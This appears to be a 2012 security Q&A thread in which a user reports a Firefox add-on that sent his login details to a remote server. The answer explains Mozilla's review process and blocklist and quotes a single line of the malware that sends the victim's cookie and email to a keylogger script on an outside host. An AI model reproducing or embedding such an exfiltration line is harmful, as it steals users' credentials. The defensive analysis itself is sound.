0

Some videos on YouTube demonstrate how a Firefox extension can collect login information used to login to websites such as Facebook.

After installing this tool/malware as Firefox Add-on, I observed the activity of my browser using Firebug. My username and password was sent to a server via Ajax request.

I contacted the author. He said that he can embed this script to any Firefox Add-on.

How can I securely use Firefox Add-ons? I installed 3 types of Antivirus and Firewall. But none of that was able to detect this malware.

Rob W
  • 2,113
  • 18
  • 20
open source guy
  • 1,909
  • 9
  • 25
  • 27
  • 1
    For testing i made a new gmail account. test the second tool. after 10 or 12 hour i got the entered password in my original account . I have https connection,antivirus, firewall.why this happened? – open source guy Aug 04 '12 at 11:07
  • Related [What are the security implications of people downloading plugins, wrongly thinking that they are safe?](http://security.stackexchange.com/q/5875/665) – Hendrik Brummermann Aug 04 '12 at 11:16
  • @dippu - This sort of malicious file is easy to avoid. Understand how Firefox Add-ons work and only use add-ons that have been verified and are not written by malicious users. – Ramhound Aug 06 '12 at 13:38

1 Answers1

4

How do you protect yourself

Firefox addons from the official site are put through the addon review proces https://addons.mozilla.org/en-US/developers/docs/policies/reviews

So you can check if an addon is official and has been reviewed before installing.

It's not 100% You can find a list of blocked addons removed by Mozilla due to given reasons (viruses, trojans, etc.) https://addons.mozilla.org/en-US/firefox/blocked/

Installing an addon from a 3rd party is more dangerous, so you may need to personally check the source code (which is possible since it's a zip of javascript files) or trust the author/provider.

How does the maleware work?

The .xul file contains the following line of code:

xhr.open("GET", 
      "http://www.removedurl.com/keylogger/snooper.php?
       facebook="+cookie+'&email='+email, true);

So when you test this script on your own account it will be sending him the your password. For this reason you should delete this addon and change your password.

Hendrik Brummermann
  • 27,118
  • 6
  • 79
  • 121